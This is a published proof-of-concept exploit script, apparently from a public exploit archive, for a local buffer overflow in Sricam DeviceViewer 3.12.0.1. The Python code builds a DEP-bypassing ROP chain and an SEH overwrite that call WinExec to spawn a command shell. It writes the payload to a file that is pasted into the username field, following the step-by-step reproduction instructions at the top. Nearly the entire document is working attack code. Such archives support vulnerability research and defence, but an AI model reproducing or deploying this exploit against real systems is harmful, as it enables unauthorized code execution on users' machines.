DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)

# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1

# Steps to reproduce:
#   1. Get the WinExec address from arwin.exe kernel32.dll WinExec
#   2. Change the related address in the PoC
#   3. Generate the payload using the PoC
#   4. Log in the Sricam DeviceViewer application
#   5. Go to System Configuration -> User Management
#   6. Put the content of the generated file in User Info -> Username  
#   7. Click on Add
#   8. A command shell will appear

#!/usr/bin/python

from struct import pack, unpack

def create_rop_chain():

    rops = [
    
    0x6a1142aa,  # XOR EDX,EDX # RETN
    
    0x6a569810,  # POP EDX # RETN [avcodec-54.dll] 
    0x6ae9c126,  # &Writable location [avutil-50.dll] 
    
    0x6a5dac8a,  # POP EAX # RETN
    0xff9b929d,  # NEG "cmd\0"

    0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]
    
    0x6994766b,  # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
        
    0x6a18e062,  # ADD ESP, 10 # RETN ---> ESI
    0x6a2420ea,  # ROP NOP            ---> EDI     
        
    0x6a45e446,  # XCHG EAX,EDX # RETN  [avcodec-54.dll] 
    0x6a29d716,  # XCHG EAX,ECX # RETN  [avcodec-54.dll] 
    
    ##  ECX = ascii "cmd\0"
    
    0x6a569810,  # POP EDX # RETN [avcodec-54.dll] 
    0x6a36264a,  # CALL EBX
   
    ## EDX = CALL EBX
   
    0x6a5dac8a,  # POP EAX # RETN
    0x76e33231,  # ptr to WinExec() [kernel32.dll]  
    #### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication  
    
    0x6a150411,  # XCHG EAX,EBX # RETN [avcodec-54.dll]
    
    ## EBX = &WinExec
    
    0x6a5dac8a,  # POP EAX # RETN
    0xffffffff,  # -0x00000001-> ebx
    0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]
    
    ## EAX = 1
        
    0x6a5eb992,  # PUSHAD # RETN [avcodec-54.dll]
    0x6a2420ea,  # ROP NOP    
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    ]
    return ''.join(pack('<I', _) for _ in rops)


def nops(length):
    return "\x90" * length

rop_chain = create_rop_chain()
maxlen = 5000

# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} :  # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)

# Don't care nseh
nseh = nops(4)

payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec) # More junk to reach 5000

print("Exploit Length: " + str(len(payload)))

try:
    fname = "exprop.txt"
    exploit = open(fname,"w")
    print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
    print("Author: Alessandro Magnosi\n")
    print("[*] Creating evil username")
    exploit.write(payload)
    exploit.close()
    print("[+] Username file created\n")
    print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
    print("[+] A command shell will open")
except:
    print("[!] Error creating the file")